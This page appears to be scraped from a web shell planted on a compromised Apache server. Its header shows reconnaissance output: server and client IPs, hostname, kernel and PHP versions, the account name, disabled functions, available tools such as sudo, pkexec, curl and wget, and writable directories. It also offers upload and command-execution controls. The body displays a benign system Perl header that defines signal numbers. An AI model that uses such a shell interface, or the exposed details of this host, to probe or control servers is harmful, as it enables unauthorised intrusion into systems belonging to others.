Private
Server IP : 195.201.23.43  /  Your IP : 3.15.0.42
Web Server : Apache
System : Linux webserver2.vercom.be 5.4.0-192-generic #212-Ubuntu SMP Fri Jul 5 09:47:39 UTC 2024 x86_64
User : kdecoratie ( 1041)
PHP Version : 7.1.33-63+ubuntu20.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/x86_64-linux-gnu/perl/5.30/bits/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/x86_64-linux-gnu/perl/5.30/bits/signum.ph
require '_h2ph_pre.ph';

no warnings qw(redefine misc);

unless(defined(&_BITS_SIGNUM_H)) {
    eval 'sub _BITS_SIGNUM_H () {1;}' unless defined(&_BITS_SIGNUM_H);
    unless(defined(&_SIGNAL_H)) {
	die("Never include <bits/signum.h> directly; use <signal.h> instead.");
    }
    require 'bits/signum-generic.ph';
    eval 'sub SIGSTKFLT () {16;}' unless defined(&SIGSTKFLT);
    eval 'sub SIGPWR () {30;}' unless defined(&SIGPWR);
    undef(&SIGBUS) if defined(&SIGBUS);
    eval 'sub SIGBUS () {7;}' unless defined(&SIGBUS);
    undef(&SIGUSR1) if defined(&SIGUSR1);
    eval 'sub SIGUSR1 () {10;}' unless defined(&SIGUSR1);
    undef(&SIGUSR2) if defined(&SIGUSR2);
    eval 'sub SIGUSR2 () {12;}' unless defined(&SIGUSR2);
    undef(&SIGCHLD) if defined(&SIGCHLD);
    eval 'sub SIGCHLD () {17;}' unless defined(&SIGCHLD);
    undef(&SIGCONT) if defined(&SIGCONT);
    eval 'sub SIGCONT () {18;}' unless defined(&SIGCONT);
    undef(&SIGSTOP) if defined(&SIGSTOP);
    eval 'sub SIGSTOP () {19;}' unless defined(&SIGSTOP);
    undef(&SIGTSTP) if defined(&SIGTSTP);
    eval 'sub SIGTSTP () {20;}' unless defined(&SIGTSTP);
    undef(&SIGURG) if defined(&SIGURG);
    eval 'sub SIGURG () {23;}' unless defined(&SIGURG);
    undef(&SIGPOLL) if defined(&SIGPOLL);
    eval 'sub SIGPOLL () {29;}' unless defined(&SIGPOLL);
    undef(&SIGSYS) if defined(&SIGSYS);
    eval 'sub SIGSYS () {31;}' unless defined(&SIGSYS);
    undef(&__SIGRTMAX) if defined(&__SIGRTMAX);
    eval 'sub __SIGRTMAX () {64;}' unless defined(&__SIGRTMAX);
}
1;
Private